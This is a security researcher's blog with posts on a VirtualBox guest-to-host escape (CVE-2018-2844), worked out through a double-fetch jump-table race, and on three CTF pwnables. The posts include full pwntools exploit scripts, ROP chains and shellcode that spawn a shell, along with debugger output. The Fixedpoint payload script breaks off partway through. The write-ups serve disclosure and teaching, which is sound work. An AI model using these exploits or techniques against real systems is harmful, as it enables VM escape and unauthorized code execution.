Tuesday, August 28, 2018

From Compiler Optimization to Code Execution - VirtualBox VM Escape - CVE-2018-2844

Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works on top of VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory implemented using Video RAM buffer. The VRAM buffer is at physical address 0xE0000000
sudo lspci -vvv

00:02.0 VGA compatible controller: InnoTek Systemberatung GmbH VirtualBox Graphics Adapter (prog-if 00 [VGA controller])
 ...
 Interrupt: pin A routed to IRQ 10
 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=16M]
 Expansion ROM at  [disabled]
 Kernel modules: vboxvideo
The guest sets up command buffer using HGSMI as below and writes the offset in VRAM to IO port VGA_PORT_HGSMI_GUEST (0x3d0) to notify the host.
 HGSMIBUFFERHEADER header; 
 uint8_t data[header.u32BufferSize]; 
 HGSMIBUFFERTAIL tail;
The bug specifically occurs in code handling Video DMA (VDMA) commands passed from Guest to Host. The VDMA command handling function vboxVDMACmdExec() dispatches to specific functions based on VDMA command types. This is implemented as switch case statements.
static int
vboxVDMACmdExec(PVBOXVDMAHOST pVdma, const uint8_t *pvBuffer, uint32_t cbBuffer)
{
 /* pvBuffer is shared memory in VRAM */
        PVBOXVDMACMD pCmd = (PVBOXVDMACMD)pvBuffer;

        switch (pCmd->enmType) {
                case VBOXVDMACMD_TYPE_CHROMIUM_CMD: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_PRESENT_BLT: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_NOP: {
                        ...
                }
                case VBOXVDMACMD_TYPE_CHILD_STATUS_IRQ: {
                        ...
                }
                default: {
                         ...
                }
        }
}
The compiler optimizes the switch cases to jump tables. This is what it looks like after optimization:
; first fetch happens for cmp
.text:00000000000B957A                 cmp     dword ptr [r12], 0Ah ; switch 11 cases
.text:00000000000B957F                 ja      VBOXVDMACMD_TYPE_DEFAULT ; jumptable 00000000000B9597 default case

; second fetch again for pCmd->enmType from shared memory
.text:00000000000B9585                 mov     eax, [r12]
.text:00000000000B9589                 lea     rbx, vboxVDMACmdExec_JMPS
.text:00000000000B9590                 movsxd  rax, dword ptr [rbx+rax*4]
.text:00000000000B9594                 add     rax, rbx
.text:00000000000B9597                 jmp     rax             ; switch jump
.rodata:0000000000185538 vboxVDMACmdExec_JMPS dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                                         ; DATA XREF: vboxVDMACommand+1D9o
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_PRESENT_BLT - 185538h ; jump table for switch statement
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185564                 align 20h
The issue is quite clear, its a TOCTOU bug. Since the variable is not marked volatile, GCC optimizations resulted in double fetch from shared VRAM memory. I didn't see such optimization in VirtualBox for Windows and OSX. Only Linux hosts are affected.

Note that this kind of issue is not new. We have prior research Xenpwn - Breaking Paravirtualized Devices by Felix Wilhelm on similar issue found in Xen

Exploitation:

Though the race window is really small, it can be reliably won on guests having more than one vCPU.
 RAX  0xdeadbeef
 RBX  0x7fff8abf2538 ◂— rol    byte ptr [rdx - 0xd], 1
 RCX  0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 RDX  0xe7b
 RDI  0xeeb
 RSI  0x7fffdc022000 ◂— xor    byte ptr [rax], al /* 0xffe40030; '0' */
 R8   0x7fff89d20000 ◂— jmp    0x7fff89d20010 /* 0xb020000000eeb */
 R9   0x7fff8ab06040 ◂— push   rbp
 R10  0x7fff9c50ad48 ◂— 0x1 
 R11  0x7fff9c508d48 ◂— 0x0
 R12  0x7fff89d20078 ◂— 0xa /* '\n' */ 
 R13  0xf3b
 R14  0x7fff9c50d0e0 —▸ 0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 R15  0x7fff89d20030 ◂— 0xffffffdc0f3b0eeb
 RBP  0x7fffba44dc40 —▸ 0x7fffba44dca0 —▸ 0x7fffba44dce0 —▸ 0x7fffba44dd00 —▸ 0x7fffba44dd50 ◂— ...
 RSP  0x7fffba44db80 —▸ 0x7fffba44dbb0 —▸ 0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 RIP  0x7fff8ab26590 ◂— movsxd rax, dword ptr [rbx + rax*4]


 ► 0x7fff8ab26590    movsxd rax, dword ptr [rbx + rax*4]
   0x7fff8ab26594    add    rax, rbx
   0x7fff8ab26597    jmp    rax
RAX is controlled by guest. R8, R12 and R15 points to offsets within HGSMI buffer during the crash. The jump table uses relative addressing, hence once cannot directly call into a pointer. First plan was to find a feature, which allows to write a controlled value in VBoxDD.so from guest and further use it as fake jump table. However, I failed to find one.

Next option is to directly jump to the VRAM buffer mapped with RWX permissions using whatever value available for fake jump table.
    // VRAM buffer
    0x7fff88d21000     0x7fff89d21000 rwxp  1000000 0

    
    // VBoxDD.so
    0x7fff8aa6d000     0x7fff8adff000 r-xp   392000 0      /usr/lib/virtualbox/VBoxDD.so
    0x7fff8adff000     0x7fff8afff000 ---p   200000 392000 /usr/lib/virtualbox/VBoxDD.so
    0x7fff8afff000     0x7fff8b010000 r--p    11000 392000 /usr/lib/virtualbox/VBoxDD.so
    0x7fff8b010000     0x7fff8b018000 rw-p     8000 3a3000 /usr/lib/virtualbox/VBoxDD.so
Find a value in VBoxDD.so (assume as some fake jump table), which during relative address calculation will point into the 16MB shared VRAM buffer. For the proof-of-concept exploit fill the entire VRAM with NOP's and place the shellcode at the final pages of the mapping. No ASLR bypass is needed since the jump is relative.

In the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf. vboxvideo.ko driver has a custom allocator to manage VRAM memory and HGSMI guest side implementations. Blacklisting vboxvideo reduces activity on VRAM and keeps the payload intact. The exploit was tested with Ubuntu Server as Guest and Ubuntu Desktop as host running VirtualBox 5.2.6.r120293.

The proof-of-concept exploit code with process continuation and connect back over network can be found at virtualbox-cve-2018-2844



References:

[1] Xenpwn - Breaking Paravirtualized Devices by Felix Wilhelm
[2] SSD Advisory – Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities by Niklas Baumstark
[3] VM escape - QEMU Case Study by Mehdi Talbi & Paul Fariello
[4] Xen Security Advisory CVE-2015-8550 / XSA-155
[5] Oracle Critical Patch Update Advisory - April 2018

Saturday, August 11, 2018

Real World CTF - kid_vm

kid_vm is a KVM API based challenge. The provided user space binary uses KVM ioctl calls to setup guest and execute guest code in 16-bit real mode. The binary comes with following mitigations
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
The guest code is copied to a page allocated using mmap. KVM_SET_USER_MEMORY_REGION call then sets up guest memory with guest physical starting at address 0 and backing memory pointing to the mmap’ed page
       
        guest_memory = mmap(0, 0x10000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
        if (!guest_memory) {
                perror("Mmap fail");
                return 1;
        }

        /* copy guest code */
        memcpy(guest_memory, guest, sizeof(guest));

        region.slot = 0;
        region.guest_phys_addr = 0;
        region.memory_size = 0x10000;
        region.userspace_addr = (uint64_t) guest_memory;

        if (ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region) == -1) {
The guest code also sets KVM_GUESTDBG_SINGLESTEP which causes VM exit (KVM_EXIT_DEBUG) on each step. KVM does doesn't seem to notify userspace code on VM exit caused by vmcall. Single stepping looks like a work around to detect vmcall instruction.
        memset(&debug, 0, sizeof(debug));
        debug.control = KVM_GUESTDBG_ENABLE | KVM_GUESTDBG_SINGLESTEP;

        if (ioctl(vcpu, KVM_SET_GUEST_DEBUG, &debug) < 0) {
                perror("Fail");
                return 1;
        }
The next interesting part of code is the user space VM exit handler
    switch (run->exit_reason) {

        case KVM_EXIT_IO:
            if (run->io.direction == KVM_EXIT_IO_OUT && run->io.size == 1
                         && run->io.port == 23 && run->ex.error_code == 1) {

                putchar(*((char *)run + run->io.data_offset));
                continue;
            }

            if (run->io.direction == KVM_EXIT_IO_IN && run->io.size == 1
                            && run->io.port == 23 && run->ex.error_code == 1) {

                read(0, ((char *)run + run->io.data_offset), 1);
                continue;
            }

            fwrite("Unhandled IO\n", 1, 0xD, stderr);
            return 1;

        case KVM_EXIT_DEBUG:
            if (ioctl(vcpu, KVM_GET_REGS, &regs) == -1)
                puts("Error get regs!");

            /* check if VMCALL instruction */
            if (guest_memory[regs.rip] == 0xF && guest_memory[regs.rip + 1] == 1
                                        && guest_memory[regs.rip + 2] == 0xC1) {

                if (ioctl(vcpu, KVM_GET_REGS, &regs) == -1)
                    puts("Error get regs!");

                switch (regs.rax) {

                    case 0x101:
                        free_memory(regs.rbx, regs.rcx);
                        break;
                    case 0x102:
                        copy_memory(regs.rbx, regs.rcx, regs.rdx, guest_memory);
                        break;
                    case 0x100:
                        alloc_memory(regs.rbx);
                        break;
                    default:
                        puts("Function error!");
                        break;
                }
           }
           continue;
VM exits caused port I/O ( KVM_EXIT_IO) are handled to read and write data using stdin/stdout. Three interesting hypercalls are implemented on top of KVM_EXIT_DEBUG event.

Host Bugs:

A. The array that manages host allocations and size, can be accessed out of bound by all 3 hypercalls (free_memory, copy_memory, alloc_memory) Below is the code from alloc_memory
     /* index can take the value 16 here when going out of loop */
     for (index = 0; index <= 0xF && allocations[index]; ++index);

     mem = malloc(size);

     if (mem) {
         allocations[index] = mem;        // out of bounds access
         alloca_size[index] = size;       // can overwrite allocations[0]
         ++number_of_allocs;

This bug is less interesting for exploitation, since there is an use-after-free which gives better primitives

B. The hypercall for freeing memory has an option to free a pointer but not clear the reference. However the guest code enables to access only case 3.
        if (index <= 16) {               // out of bound access

                switch (choice) {

                        case 2:
                                free(allocations[index]);
                                allocations[index] = 0;
                                // can be decremented arbitrary number of times
                                --number_of_allocs;                     
                                break;
                        case 3:
                                free(allocations[index]);
                                allocations[index] = 0;
                                alloca_size[index] = 0;
                                // can be decremented arbitrary number of times
                                --number_of_allocs;                     
                                break;
                        case 1:
                                // double free/UAF as pointer is not set to NULL
                                free(allocations[index]);               
                                break;
                }
        } 
This UAF can be further exercised in the hypercall to copy memory between guest and host
    if (size <= alloca_size[index]) {
        if (choice == 1) {
            // write to freed memory due to UAF
            memcpy(allocations[index], guest_memory + 0x4000, size);        
        }
        else if (choice == 2) {
            // read from uninitialized or freed memory
            memcpy(guest_memory + 0x4000, allocations[index], size);        
        }
    } 
Guest Bug:

Though the host code has UAF, this bug cannot be triggered using the guest code thats currently under execution. Hence we need to achieve code execution in the guest before trying for a VM escape. The guest code starts at address 0. It initializes the stack pointer to 0x3000
seg000:0000                 mov     sp, 3000h
seg000:0003                 call    main
seg000:0006                 hlt
The guest code to allocate memory in guest looks like below:
seg000:007E                 mov     ax, offset size_value
seg000:0081                 mov     bx, 2           ; get 2 byte size
seg000:0084                 call    inb
seg000:0087                 mov     ax, ds:size_value
seg000:008A                 cmp     ax, 1000h       ; check if size < 0x1000
seg000:008D                 ja      short size_big
seg000:008F                 mov     cx, ds:total_bytes
seg000:0093                 cmp     cx, 0B000h
seg000:0097                 ja      short guest_mem_full
seg000:0099                 mov     si, word ptr ds:nalloc
seg000:009D                 cmp     si, 16          ; check the number of allocations made
seg000:00A0                 jnb     short too_many_allocs
seg000:00A2                 mov     di, cx
; move beyond stack@0x3000 and host shared_mem@0x4000, but this can wrap
seg000:00A4                 add     cx, 5000h       
seg000:00A8                 add     si, si
seg000:00AA                 mov     ds:address_array[si], cx ; save address
seg000:00AE                 mov     ds:size_array[si], ax ; save size
seg000:00B2                 add     di, ax
seg000:00B4                 mov     ds:total_bytes, di
seg000:00B8                 mov     al, ds:nalloc
seg000:00BB                 inc     al
seg000:00BD                 mov     ds:nalloc, al

The guest uses the following memory region:
text region  @ 0x0
stack bottom @ 0x3000
shared memory @ 0x4000
heap @ 0x5000 – 0x5000+0xB000
The guest memory allocator starts at address 0x5000 and checks for maximum memory limit allocated being 0xB000. However the check total_bytes + 0x5000 can wrap to 0 during 16-bit addition. This allocation at address 0, allows to overwrite guest code with arbitrary code. Now the vulnerable hypercall paths in host can be triggered from guest.

Exploitation:

I didn’t overwrite the entire guest code, but extended its functionality with the following changes to set bx with user supplied values during vmcall
seg000:0058 _free_memory:                           ; CODE XREF: main+2A↑j
seg000:0058                 call    get_choice
seg000:005B                 jmp     short loop
seg000:01A3                 call    set_choice
seg000:01A6                 mov     cl, ds:index    ; index
seg000:01AA                 mov     dx, ds:size_value
seg000:01AE                 vmcall
 
seg000:01DF                 mov     ax, 101h        ; free
seg000:01E2                 call    set_choice
seg000:01E5                 mov     cl, ds:index
seg000:01E9                 vmcall
seg000:0386 choice          dw 0                    ; DATA XREF: get_choice+B↓o
seg000:0386                                         ; set_choice↓r
seg000:0388
seg000:0388 get_choice      proc near               ; CODE XREF: main:_free_memory↑p
seg000:0388                 push    ax
seg000:0389                 push    bx
seg000:038A                 mov     ax, (offset aElcomeToTheVir+0B7h) ; 
seg000:038D                 mov     bx, 0Ch
seg000:0390                 call    outb
seg000:0393                 mov     ax, offset choice
seg000:0396                 mov     bx, 1
seg000:0399                 call    inb
seg000:039C                 pop     bx
seg000:039D                 pop     ax
seg000:039E                 retn
seg000:039E get_choice      endp
seg000:039E
seg000:039F set_choice      proc near               ; CODE XREF: update_host_memory+4C↑p
seg000:039F                                         ; free_host_memory+1F↑p
seg000:039F                 mov     bx, ds:choice
seg000:03A3                 retn
seg000:03A3 set_choice      endp
Leaking libc and heap pointers:

Since unsorted chunk freelist pointers can be read using UAF, this leaks arena and heap pointers. Allocate 4 chunks, free alternate chunks to prevent coalescing and read the pointers using UAF as below:
for x in range(4):
    allocate_host_memory(256)

free_host_memory(0, INVALID_FREE)
free_host_memory(2, VALID_FREE) 

copy_memory(256, 0, 'A'*256, COPY_FROM_HOST)
heap_mem = p.recvn(0x1000)
Getting code execution:

House of Orange works for this situation. Create a large chunk and free it, but hold reference to the pointer. Later use this reference to overwrite the top chunk to gain code execution. The flag in rwctf format was WoW_YoU_w1ll_B5_A_FFFutuRe_staR_In_vm_E5c4pe. The exploit for the challenge can be found here

References: Using the KVM API, House of Orange

Sunday, July 2, 2017

Google CTF – Pwnables - Inst Prof

Summary of Exploitation:

Leak CPU Time Stamp Counter (TSC)
Predict TSC values
Leak ELF base address using predicted TSC values
Return into read_n function
ROP payload of mprotect + read to execute shellcode

Analysis:

The provided binary is a 64-bit ELF with PIE and NX enabled with below functions:

• Main function sets up alarm for 30 seconds and invokes do_test function in infinite loop
• Allocate a memory page using mmap with PROT_READ | PROT_WRITE permission
• Copy a template code which executes 4 NOPs in a loop 0x1000 times
• Replace NOP with 4 bytes of user supplied code
• Make the page PROT_READ | PROT_EXEC using mprotect
• Measure the TSC before execution of shellcode
• Execute the shellcode
• Measure the TSC after execution of shellcode
• Output the difference in TSC
• Free the page using munmap and execute the loop again

Leaking CPU Time Stamp Counter (TSC):
.text:0000000000000B08      rdtsc              ; get Time Stamp Counter 
.text:0000000000000B0A      shl     rdx, 20h
.text:0000000000000B0E      mov     r12, rax
.text:0000000000000B11      xor     eax, eax
.text:0000000000000B13      or      r12, rdx   ; load TSC values in RDX & RAX to R12
.text:0000000000000B16      call    rbx        ; execute the shellcode
.text:0000000000000B18      rdtsc              ; get Time Stamp Counter
.text:0000000000000B1A      mov     edi, 1         
.text:0000000000000B1F      shl     rdx, 20h
.text:0000000000000B23      lea     rsi, [rbp+buf] 
.text:0000000000000B27      or      rdx, rax
.text:0000000000000B2A      sub     rdx, r12   ; Find the difference in TSC
.text:0000000000000B2D      mov     [rbp+buf], rdx
.text:0000000000000B31      mov     edx, 8         
.text:0000000000000B36      call    _write     ; Output the result
The TSC value is stored in R12 before execution of shellcode, later used for measuring difference as
.text:0000000000000B2A                 sub      rdx, r12
If the 4-byte user supplied code does xor r12, r12, the program outputs the entire RDX value (i.e. TSC) and goes into the next loop

Idea to leak pointers:

Load register R12 with a pointer fetched from stack as mov r12, [rbp-offset]. Now the program outputs (TSC – pointer loaded into R12). The problem here is both TSC and pointer in R12 are unknown values. However, we know the TSC value leaked from previous execution of loop. Let’s try to predict the current TSC value based on previous value.

TSC is measured under following conditions:

• Initial executions of do_test will take more CPU cycles due to cache effect
• Executing the do_test function multiple times will reduce the CPU cycles between loops. This is cache warming
• Do not read/write data per loop. Send all the payload once and read the output after all their executions. There should be no blocking

Consider the below code snippet:
for _ in range(16):
    payload += asm("xor r12, r12; nop")

r.send(payload)
tsc_values = r.recv(8 * 16)

first_tsc = u64(tsc_values[0:8])
prev_tsc  = first_tsc

print("[+] TSC = 0x%x" % (first_tsc))

for i in range(1, 16):
    curr_tsc = u64(tsc_values[i*8:(i+1)*8])
    diff_tsc = curr_tsc - prev_tsc
    prev_tsc = curr_tsc
    print("[+] TSC = 0x%x, diff = 0x%x" % (curr_tsc, diff_tsc))
$ python tsc_leak.py 
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
[+] TSC = 0x244baebdaa75f
[+] TSC = 0x244baebdc57b4, diff = 0x1b055
[+] TSC = 0x244baebdcb015, diff = 0x5861
[+] TSC = 0x244baebdcfdb8, diff = 0x4da3
[+] TSC = 0x244baebdd47d8, diff = 0x4a20
[+] TSC = 0x244baebdd9272, diff = 0x4a9a
[+] TSC = 0x244baebdddd3b, diff = 0x4ac9
[+] TSC = 0x244baebde2850, diff = 0x4b15
[+] TSC = 0x244baebde7353, diff = 0x4b03
[+] TSC = 0x244baebdebf1b, diff = 0x4bc8
[+] TSC = 0x244baebdf0a4d, diff = 0x4b32
[+] TSC = 0x244baebdf56d3, diff = 0x4c86
[+] TSC = 0x244baebdfa1ec, diff = 0x4b19
[+] TSC = 0x244baebdfecdc, diff = 0x4af0
[+] TSC = 0x244baebe037b3, diff = 0x4ad7
[+] TSC = 0x244baebe08c23, diff = 0x5470
After the first few executions with higher CPU cycles, the values have come down and more regular i.e. predictable with good accuracy, except for some of the LSB bits

Leaking ELF base address:

To leak the ELF base address, load R12 register with value from rbp-0x28. This holds the pointer to
 
.text:0000000000000B18                 rdtsc
Now the program outputs (predicted TSC value – pointer loaded into R12), from which the pointer in R12 register can be computed. The last few bits might be inaccurate. However, the last 12 bits of the pointer are known as they are not randomized due to page alignment.

Can the LSB bits also can be leaked reliably using the technique? Yes, read the pointers in two chunks. i.e. instead of reading from rbp-0x28 as below:
gdb-peda$ x/gx $rbp-0x28
0x7fffffffde48: 0x0000555555554b18
Read the pointers into halves twice. Out of 8-byte address, 2 MSB bytes are 0x00
gdb-peda$ x/gx $rbp-0x2a
0x7fffffffde46: 0x555555554b180000
gdb-peda$ x/gx $rbp-0x2d
0x7fffffffde43: 0x554b180000000000
Since MSB bytes of TSC can be reliable found unlike the LSB bytes, this results in a reliable info leak. Below is the code:
for _ in range(16):
    payload += asm("xor r12, r12; nop")

# try finding difference in execution time between do_loop to predict rdtsc output

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2d]")  # leak 3 lsb bytes, unaligned read

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2a]")  # leak 3 msb bytes, unaligned read

print("[+] warming up cache for leaking pointers")
r.send(payload)
r.recv(16 * 8)

# leaking pointers in two chunks to make up for less predictable LSB values of TSC

t1 = u64(r.recv(8))       # leak lsb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))
print("[+] leaked TSC value = 0x%x") % (t1)

pointer_lsb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_lsb = 0x%x" % (pointer_lsb))

t1 = u64(r.recv(8))       # leak msb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))

pointer_msb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_msb = 0x%x" % (pointer_msb))

# .text:0000000000000B18    rdtsc
pointer = (pointer_msb << 24) | pointer_lsb
print("[+] leaked address = 0x%x" % (pointer))

elf_base = pointer & 0xfffffffffffff000
print("[+] ELF base address = 0x%x" % (elf_base))
Gaining RIP control using relative write w.r.t RBP:

Once the ELF base address is leaked, a small ROP payload is setup in stack to invoke the read_n function using a series of mov operations:
# payload to return into read_n function

payload  = asm("mov r13, rsp; ret")
payload += asm("mov r14, [r13]")       # .text:0000000000000B18 rdtsc
payload += asm("mov r14b, 0xc3; ret")  # modify LSB to get pop rdi gadget
payload += asm("mov r15, [rbp-0x48]")  # .text:0000000000000AA3 mov[rbx-1],al
payload += asm("mov r15b, 0x80; ret")  # modify LSB to get read_n address
payload += asm("mov [rbp+24], r15")    # return into read_n
payload += asm("mov [rbp+16], r13")    # stack address as argument for read_n
payload += asm("mov [rbp+8], r14")     # overwrite RIP with pop rdi; read_n(stack_address, 0x1000)
r.send(payload)
RSI already holds the value 0x1000 due to the program state, hence the call becomes read_n(RSP, 0x1000). The function reads and executes a ROP payload to perform the below operations:
mprotect(elf_base, 0x1000, 7)
read(0, elf_base, 0x100)
jmp elf_base
$ python solver.py 
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
[+] warming up cache for leaking pointers
[+] leaked TSC value = 0x30aba58d51eb8
[+] pointer_lsb = 0x173b18
[+] pointer_msb = 0x55636a
[+] leaked address = 0x55636a173b18
[+] ELF base address = 0x55636a173000
[+] sending ROP payload
[*] Switching to interactive mode
$ id
uid=1337(user) gid=1337(user) groups=1337(user)
$ cat flag.txt
CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}
Here is the full exploit:
from pwn import *

host = 'inst-prof.ctfcompetition.com'
port = 1337

context.arch = 'amd64'

if len(sys.argv) == 2: 
    r = process('./inst_prof')
else: 
    r = remote(host, port)
r.recvline()

# warmup the cache for the leaking pointers

payload = ''
for _ in range(16):
    payload += asm("xor r12, r12; nop")

# try finding difference in execution time between do_loop to predict rdtsc output

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2d]")  # leak 3 lsb bytes, unaligned read

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2a]")  # leak 3 msb bytes, unaligned read

print("[+] warming up cache for leaking pointers")
r.send(payload)
r.recv(16 * 8)

# leaking pointers in two chunks to make up for less predictable LSB values of TSC

t1 = u64(r.recv(8))       # leak lsb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))
print("[+] leaked TSC value = 0x%x") % (t1)

pointer_lsb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_lsb = 0x%x" % (pointer_lsb))

t1 = u64(r.recv(8))       # leak msb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))

pointer_msb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_msb = 0x%x" % (pointer_msb))

# .text:0000000000000B18    rdtsc
pointer = (pointer_msb << 24) | pointer_lsb
print("[+] leaked address = 0x%x" % (pointer))

elf_base = pointer & 0xfffffffffffff000
print("[+] ELF base address = 0x%x" % (elf_base))

# payload to return into read_n function

payload  = asm("mov r13, rsp; ret")
payload += asm("mov r14, [r13]")       # .text:0000000000000B18 rdtsc
payload += asm("mov r14b, 0xc3; ret")  # pop rdi; ret
payload += asm("mov r15, [rbp-0x48]")  # .text:0000000000000AA3 mov     [rbx-1], al
payload += asm("mov r15b, 0x80; ret")  # read_n address
payload += asm("mov [rbp+24], r15")    # return into read_n
payload += asm("mov [rbp+16], r13")    # stack address
payload += asm("mov [rbp+8], r14")     # overwrite RIP with pop rdi; read_n(stack_address, 0x1000)
r.send(payload) 
r.recv(8 * 8)

# send ROP payload using leaked ELF base address
print("[+] sending ROP payload")

payload  = "A" * 72
payload += p64(elf_base + 0xbba)  # 0x00000bba: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 
payload += p64(0)
payload += p64(1)
payload += p64(elf_base + 0x0202028)  # GOT address of alarm as NOP for call   QWORD PTR [r12+rbx*8]
payload += p64(0x7)                   # rdx 
payload += p64(0x1000)                # rsi
payload += p64(0x4545454545454545)    # rdi
payload += p64(elf_base + 0xba0)      # __libc_csu_init
payload += "F"* 8

payload += p64(0)
payload += p64(1)
payload += p64(elf_base + 0x0202028)  # GOT address of alarm as NOP for call   QWORD PTR [r12+rbx*8]
payload += p64(0x100)                 # rdx, load registers for read
payload += p64(elf_base)              # rsi
payload += p64(0)                     # rdi

# make ELF header RWX
payload += p64(elf_base + 0xbc3)      # pop rdi; ret
payload += p64(elf_base)              # rdi
payload += p64(elf_base + 0x820)      # mprotect(elf_base, 0x1000, 7)

# read into ELF header
payload += p64(elf_base + 0xba0)      # __libc_csu_init
payload += "G" * 56
payload += p64(elf_base + 0x7e0)      # read(0, elf_base, 0x100)

# return to shellcode
payload += p64(elf_base)
payload += p64(0xdeadbeef00000000)

payload += "B" * (4096 - len(payload))
r.send(payload)

sc  = asm(shellcraft.amd64.linux.syscall('SYS_alarm', 0))
sc += asm(shellcraft.amd64.linux.sh())
r.sendline(sc)
r.interactive()

Tuesday, April 19, 2016

Plaid CTF 2016 - Fixedpoint

The binary simply reads integers from user, performs floating point operations on it and stores it in a mmap'ed region with RWX permission. Finally, the mmap'ed region with floating point numbers is executed. We need to supply inputs such that, it transforms to valid shellcode. To solve this, we disassembled floating point values for each of possible values using capstone. Then grepped for needed instructions to chain them together to call execve('/bin/sh', 0, 0)

#include <stdio.h>
#include <string.h>
#include <capstone/capstone.h>

// gcc -std=c99 -o fixedpoint_disass fixedpoint_disass.c -lcapstone

int disass(unsigned int num, char *code) 
{
    csh handle;
    cs_insn *insn;
    size_t count = 0;
    size_t inssz = 0;

    if (cs_open(CS_ARCH_X86, CS_MODE_32, &handle) != CS_ERR_OK) 
        return EXIT_FAILURE;

    count = cs_disasm(handle, code, sizeof(float), 0, 0, &insn);

    if (count > 0) {

        for (int i = 0; i < count; i++) inssz += insn[i].size;

        // check if all bytes are disassembled
        if (inssz == sizeof(float)) {

            for (int i = 0; i < count; i++) 
                printf("%d :\t%s\t\t%s\n", num, insn[i].mnemonic, insn[i].op_str);
        }

        cs_free(insn, count);
    }

    cs_close(&handle);
    return 0;
}


int main(int argc, char **argv)
{
    if (argc != 3) exit(EXIT_FAILURE);

    unsigned int from = atoi(argv[1]);
    unsigned int till = atoi(argv[2]);
    char opcode[8] = {0};
    float bytes;

    for (unsigned int num = from; num <= till; num++) {
        bytes = num/1337.0;
        memcpy(opcode, (char *)&bytes, sizeof(float));
        disass(num, opcode); 
    }

    return 0;
}

Below is the payload:
#!/usr/bin/env python

from pwn import *

HOST = '127.0.0.1'
HOST = 'fixedpoint.pwning.xxx'
PORT = 7777
context.arch = 'x86_64'

soc = remote(HOST, PORT)

"""
134498: xchg  eax, edi
134498: xor  ecx, ecx
134498: inc  edx
"""
soc.sendline('134498')

"""
100487: das  
100487: push  ecx
100487: xchg  eax, esi
100487: inc  edx
"""
soc.sendline('100487')

# set space for /bin/sh
soc.sendline('100487')
soc.sendline('100487')

"""
146531: xchg  eax, edi
146531: xor  ebx, ebx
146531: inc  edx
"""
soc.sendline('146531')

"""
562055: dec  esi
562055: xor  edx, edx
562055: inc  ebx
"""
soc.sendline('562055')

"""
233578: cld  
233578: mov  bl, 0x2e
233578: inc  ebx
"""
soc.sendline('233578')

"""
198025: mov  byte ptr [esp + edx], bl
198025: inc  ebx
"""
soc.sendline('198025')

"""
2238: inc  eax
2238: inc  edx
2238: salc  
2238: aas 
"""
soc.sendline('2238')

"""
301765: cld  
301765: mov  bl, 0x61
301765: inc  ebx
"""
soc.sendline('301765')
#198025: mov             byte ptr [esp + edx], bl
soc.sendline('198025')
#2238:   inc             edx
soc.sendline('2238')

"""
311124: cld  
311124: mov  bl, 0x68
311124: inc  ebx
"""
soc.sendline('311124')
#198025: mov             byte ptr [esp + edx], bl
soc.sendline('198025')
#2238:   inc             edx
soc.sendline('2238')

"""
317809: cld  
317809: mov  bl, 0x6d
317809: inc  ebx
"""
soc.sendline('317809')
#198025: mov             byte ptr [esp + edx], bl
soc.sendline('198025')
#2238:   inc             edx
soc.sendline('2238')

"""
233578: cld             
233578: mov             bl, 0x2e
233578: inc             ebx
"""
soc.sendline('233578')
#198025: mov             byte ptr [esp + edx], bl
soc.sendline('198025')
#2238:   inc             edx
soc.sendline('2238')

"""
324494: cld  
324494: mov  bl, 0x72
324494: inc  ebx
"""
soc.sendline('324494')
#198025: mov             byte ptr [esp + edx], bl
soc.sendline('198025')
#2238:   inc             edx
soc.sendline('2238')

"""
309787: cld  
309787: mov  bl, 0x67
309787: inc  ebx
"""
soc.sendline('309787')
